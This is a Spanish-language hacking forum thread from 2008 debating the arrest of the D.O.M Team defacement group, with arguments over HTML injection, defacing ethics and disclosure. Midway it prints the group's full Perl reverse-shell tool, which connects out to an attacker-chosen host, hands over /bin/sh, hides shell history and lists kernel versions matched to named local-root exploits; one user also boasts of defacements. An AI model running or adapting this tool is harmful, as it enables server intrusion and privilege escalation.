Detenidos DOM Team, todos sus miembros detenidos. página 4

/* esto fue injection html http://foros.tux.cl/ */ jaja

no se que decir por ellos .. sorprende.

jajaja como os gusta criticar sin saber

Para inyectar ese código <div que metieron en tux.cl tuvieron que buscar otro fallo en otra web del servidor (ya que esa versión del foro no tiene fallos, puedes buscarlos si es de tu agrado), buscar los datos de la conexión a la DB de tux.cl, conectarse al SQL y updatear con el códio <div algun nombre de una sección. Asi que si no sabes lo que hablas mejor pasate por wikipedia o mejor aun... por google!
Aqui puedes leer algo: http://foro.elhacker.net/bugs_y_exploits/html_injection-t188740.0.html;msg899217

...
no creo que seas la persona más indicada para criticar...

yo dije que respetaba al team,, me puedo confundir, como todos,,, me importa tres carajos los posts, yo se lo que se y lo que no... pero decime que no tengo razon que cualqier huevon se pone a buscar webs vulnerables a inyecciones html y encunetra muchisimas paginas, y se pone a reformar los index... esa es mi opinion, decime qe estoy equivocado, dame una justificacion, te la acepto y te aplaudo...

Simplemente pasó lo que tenía que pasar, me parecen unos lammers ¿Por qué?
Está claro que no por sus conocimientos, sino como los usan, según decían lo hacían para mejorar la seguridad (lo dijeron al periódico elmundo.com), pues para mejorar se avisa y se dice al administrador no se ataca sin decir donde está el fallo.
Me parece eso penoso, simplemente decirme ¿Qué pasaría si todos los que saben del tema atacaran todas las webs que conocen?
Yo no sabré mucho de informática, pero no publico ni de coña las cosas importantes, si yo solito podría cargarme muchos foros SMF, entre otros ¿Qué haría que hace la gente que sabe más que yo? ¿Y si avisar de los fallos, atacamos?
No habrían casis webs que no se calleran de vez en cuando, Internet sería totalmente distinto a lo que es ahora. Yo me siento bien por avisar a los administradores y no atacar (aunque casi siempre sacara algo)
En toda mi vida solo hice 3 desfaces a un tio poniendo que había sido desfaceada por contener pornografía infantil (No creo que me denunciara...)
Así que yo no los considero "Hackers" en todo caso "Crackers" y menos me arrodillaré ante ellos como veo que hacen muchos.

OcultarWeb.com (Juega donde quieras sin que se den cuenta...)

Cita de: Alexandre-HcK en 20 Mayo 2008, 17:48

¿De verdad creeis que son de los 5 hackers mejores del mundo? ¿Y Kevin Mitnick y todos eses qué?

En todo caso serian los 5 mejores de inyecciones SQL, porque yo no he visto otra cosa de ellos.

Un saludo.

No so equivoqueis, en el ranking mundial tiene el 5º puesto, no es que sean los mejores, y esto segñun zone-H, vete a tu a saber de fiabiliad, de todas formas no entiendo por qué dejaron los datos en el servidor de IU, ¿Podrían averlos borrado no?... Digo yo, de todas formas no em arriesgaría, 21k de ataques... La policía, suena mal... xD

Cita de: k-k0 en 20 Mayo 2008, 03:05

1º No considero HTML Injection una tecnica de defacing.
2º Intenta meter un html injection a zone-h, no te lo aceptará

Cita de: dimitrix en 20 Mayo 2008, 08:49

dimitrix a ti tambien te gusta mucho hablar sin saber...

D.O.M no destruia archivos de las webs, siempre que hacian un mass, quedaban los index-backup para que el administrador pondria el servidor lo más rapido posible ON-LINE. Y sobre lo que dices de Hackers, tienes razón, lo que pasa que ya sabes como es la prensa de este pais

Y está claro que en todas las webs que les pidieron ayuda para arreglar los fallos, ellos echaron una mano al webmaster, por ejemplo:
http://www.manerasdevivir.com/noticias/25111/sobre-el-%22crackeo%22-deface-a-manerasdevivir-de-ayer-por-la-noche

Cita de: RaiSe en 20 Mayo 2008, 17:56

Cita de: Alexandre-HcK en 20 Mayo 2008, 17:48

¿De verdad creeis que son de los 5 hackers mejores del mundo? ¿Y Kevin Mitnick y todos eses qué?

En todo caso serian los 5 mejores de inyecciones SQL, porque yo no he visto otra cosa de ellos.

Un saludo.

Sí, por los bugs reportados y todo eso parece que se les daban bien las inyecciones.
Aunque uno de ellos me dijo que estaban laburando un articulo sobre la modificación de las cabezeras de los local root exploit para conseguir root en otras variaciones de los kernels.

Por ejemplo este código suyo que rondaba por la red:

Código

#!/usr/bin/perl
# D.O.M back connect v0.2
# written by ka0x
# we are: ka0x; an0de; xarnuz
# 5-6-2007
 
use IO::Socket::INET;
 
$host = $ARGV[0];
$port = $ARGV[1];
$pass = "d.o.m";
$cmd = "/bin/sh";
$index = "~ D.O.M Back connect t00l ~";
 
print "\n\n***** D.O.M back connect t00l *****\n\n";
die "Usage: perl $0 [IP] [PORT]\n\n" unless $ARGV[1];
 
*SOCK = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,
Proto => 'tcp',Type => SOCK_STREAM,) || die "[!] error al conectar\n";
 
print "\n[~] conectando a $host:$port...\n";
print SOCK $index;
print SOCK "\n\nPassword: ";
$p = <SOCK>; $p =~ s/\n//; $p =~ s/\r//; 
 
print "[+] shell enviada\n";
if($p eq $pass){
  print SOCK "Bienvendido..!\n\n";
  open STDIN,  "<&SOCK";
  open STDOUT, ">&SOCK";
  open STDERR, ">&SOCK";  
 
system("unset HISTFILE;unset SAVEHIST;cat /proc/version;whoami;id;who;pwd"); 
 
my $khost = `uname -r`;
chomp($khost);
print "\nKernel local: $khost\n\n";
 
my %h;
$h{'w00t'} = { vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20'] };
$h{'brk'} = { vuln=>['2.4.22','2.4.21','2.4.10','2.4.20'] };
$h{'ave'} = { vuln=>['2.4.19','2.4.20'] };
$h{'elflbl'} = { vuln=>['2.4.29'] };
$h{'elfdump'} = { vuln=>['2.4.27'] };
$h{'expand_stack'} = { vuln=>['2.4.29'] };
$h{'h00lyshit'} = { vuln=>['2.6.8','2.6.10','2.6.11','2.6.12'] };
$h{'kdump'} = { vuln=>['2.6.13'] };
$h{'km2'} = { vuln=>['2.4.18','2.4.22'] };
$h{'krad'} = { vuln=>['2.6.11'] };
$h{'krad3'} = { vuln=>['2.6.11','2.6.9'] };
$h{'local26'} = { vuln=>['2.6.13'] };
$h{'loko'} = { vuln=>['2.4.22','2.4.23','2.4.24'] };
$h{'mremap_pte'} = { vuln=>['2.4.20','2.2.25','2.4.24'] };
$h{'newlocal'} = { vuln=>['2.4.17','2.4.19'] };
$h{'ong_bak'} = { vuln=>['2.4.','2.6.'] };
$h{'ptrace'} = { vuln=>['2.2.24','2.4.22'] };
$h{'ptrace_kmod'} = { vuln=>['2.4.','2.6.'] };
$h{'ptrace24'} = { vuln=>['2.4.9'] };
$h{'pwned'} = { vuln=>['2.4.','2.6.'] };
$h{'py2'} = { vuln=>['2.6.9','2.6.17','2.6.15','2.6.13'] };
$h{'raptor_prctl'} = { vuln=>['2.6.13','2.6.17','2.6.16','2.6.13'] };
$h{'prctl3'} = { vuln=>['2.6.13','2.6.17','2.6.9'] };
$h{'remap'} = { vuln=>['2.4.'] };
$h{'rip'} = { vuln=>['2.2.'] };
$h{'stackgrow2'} = { vuln=>['2.4.29','2.6.10'] };
$h{'uselib24'} = { vuln=>['2.4.29','2.6.10','2.4.22','2.4.25'] };
$h{'newsmp'} = { vuln=>['2.6.'] };
$h{'smpracer'} = { vuln=>['2.4.29'] };
$h{'loginx'} = { vuln=>['2.4.22'] };
$h{'exp.sh'} = { vuln=>['2.6.9','2.6.10','2.6.16','2.6.13'] };
$h{'prctl'} = { vuln=>['2.6.'] };
$h{'kmdx'} = { vuln=>['2.6.','2.4.'] };
 
&busca;
sub busca {
foreach my $key(keys %h){
 
foreach my $kernel ( @{ $h{$key}{'vuln'} } ){
 
	  if($khost=~/^$kernel/){
			chop($kernel) if ($kernel=~/\.$/);
			print "P0sible 3xploit: ". $key ."\n";
			}
	   }
	}
}
 
  print "\n";
  system 'export TERM=xterm;exec sh -i';
  system($cmd);
 
}
 
 
print SOCK "bye!\n";
close SOCK;
 
__END__

Aunque no compruebe la fecha de compilación del kernel para ver si afecta a esa versión el local root exploit, ya te puede dar una idea de cual usar.

Sobre la cita del post de Alexandre-HcK, los 5 mejores lo dice la "prensa" porque estaban en 5º puesto del ranking de zone-h.

Salu2

Citar

Oh my God! ¡Hablo sin saber!
Veamos si leiste de los primeros mensajes, me jodieron una web y no vi el backup por ninguna parte.

OcultarWeb.com (Juega donde quieras sin que se den cuenta...)

jojojo,,, para mi una inyeccion html es un modo de defacing (aunq un poco estupido, en fin lo es, lo mencione para dar un estupido ejemplo), y no dije q ellos lo hacian,, dije "cualqier huevon",,, decime q no es verdad que cualqier ignorante se pone a escanear webs y encuentra miles de fallos...

Cita de: dimitrix en 20 Mayo 2008, 22:58

Citar

Oh my God! ¡Hablo sin saber!
Veamos si leiste de los primeros mensajes, me jodieron una web y no vi el backup por ninguna parte.

qué paso? lograron escalar privilegios a root en el servidor donde estaba tu web?

Citar

qué paso? lograron escalar privilegios a root en el servidor donde estaba tu web?

Ya lo expliqué, exactamente y no vi la Backup por ninguna parte.

OcultarWeb.com (Juega donde quieras sin que se den cuenta...)

Es lo que pasa por tener un root tetraplegico

Me pregunto por que le defenderás tanto...
Y ahora te metes con los pobres tetraplégicos...

OcultarWeb.com (Juega donde quieras sin que se den cuenta...)

Cita de: dimitrix en 21 Mayo 2008, 00:15

Me pregunto por que le defenderás tanto...
Y ahora te metes con los pobres tetraplégicos...

Les defiendo porque son colegas y me jode que se metan con los colegas gente que ni les conoce y ni ha hablado 1 sola vez con ellos.

Y sobre lo de los tetraplegicos, no me meto con ellos ni mucho menos...Es una forma de decir, como un sinonimo de vago. Osea si tienes un servidor tu con 500 webs, pues lo más seguro es que te preocupes por el (ya que sacas dinero con ello y haces tu trabajo), en cuanto salga un fallo parchearlo, etc... Ya que al minimo fallo en una web, las 500 webs estan en peligro.
Prefiero no discutir más.

Salu2

Buenas.

El código ese que mira los posibles exploits locales para el kernel..., eso es algo de mención?. Seguramente no es público porque no aporta nada nuevo, y es lo típico de un script kiddie. Seguramente usaban exploits de kernels que no tenian npi de como funcionaban, pero ellos los ejecutaba y les daban id0. Digo esto porque si realmente entendían lo que hacían dudo mucho que los hubieran pillado (y menos en 1 mes y medio).

Un saludo.

Foros de ayuda Yashira.org Videojuegos indetectables.net

Noticias Informatica Seguridad Informática ADSL eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.